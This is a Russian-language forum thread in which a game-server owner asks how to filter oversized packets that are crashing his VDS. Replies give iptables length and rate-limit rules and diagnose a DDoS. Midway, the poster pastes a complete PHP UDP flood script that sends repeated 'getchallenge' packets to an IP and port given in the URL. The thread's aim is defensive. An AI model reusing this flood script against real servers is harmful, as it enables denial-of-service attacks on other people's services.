Максимальный вес пакетов.

MTU ? Думаю можно, а смысл?

Уязвимое место сервера, засылаются пакеты весом >864 кб, типа яяя getinfo, что приводит к забитию стека и сервера падают.

И что по вашему должен делать сервер, если в него прилетел такой пакет, кроме как принять его в стек для обработки?

Это только роутер может уровнем выше фильтровать.

Можно ли запретить прием\отдачу пакетов "большого" размера?=)

если речь о вебсервере то в nginx tcnm ктаой параметр размер client_max_body_size

не понятно какой именно тип пакетов вы собираетесь ограничивать

и к чему это приведет если тупо резать все что больше определенного размера

максимальный размер пакета вообще-то 65535 байт

в общем случае например iptables -m length -

-A FORWARD -p icmp -m length --length 110: -j DROP

не пропусти icmp-пакеты более 110 байт...

так же можно лимитировать скорость поступления с помощью например -m limit и -m hashlimit, но опять таки не понятно что вы хотите лимитировать...

И почему эта тема не в администрировании :).

Это не пакеты столько весят, это вас ддосят, вам запросы типа POST такого размера на веб-сервер отправляют. Бороться надо несколько по-другому.

Raistlin добавил 07.05.2011 в 06:16

З.Ы. А стек у вас забивается, это еще почему? ulimit -s покажите.

Нет, на ВДС игорный сервер стоит, правда игрушки старой.

Извиняюсь, 864 байт.

Обычно смотрю через iftop траффик, максимальный вес пакетов редко превышает 50кб. Но потом подсоединяется корбиновский и идут пакеты от мегабайта и выше.

Ип конечно я заблокировал, но проблема так и не решена в корне.

Raistlin, 10240.

И еще, как я писал выше, это не вэб сервер :)

УДП скорее всего, выкладываю сам скрипт.

<?php

if(isset($_GET['ip'])){

$ip = $_GET['ip'];

}else{

$ip = '';

}

if(isset($_GET['port'])){

$port = $_GET['port'];

}else{

$port = '';

}





function brut($ip, $port) {

$s = fsockopen('udp://'.$ip, $port);

for($i=0;$i<=999;$i++){

fwrite($s, "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFFgetchallenge\x20");

}

}

#id = How many times script.php?id=123456

if(isset($_GET['id'])){

for($l=0;$l<=$_GET['id'];$l++){

brut($ip, $port);

sleep(1);

}

}





?>

Как вы через iftop смотрите размер пакетов? То ли у меня лыжи не едут, то ли разработчики этой софтинки здоровски удивятся, когда узнают... Нету там такого функционала. Оно вам скорость передачи данных показывает, а не размер пакетов.

Raistlin добавил 07.05.2011 в 09:46

мда... Вы п админа лучче наняли, с такими топорными решениями...

Raistlin добавил 07.05.2011 в 09:48

З.Ы, настроить файрволл правильно и все как рукой снимет.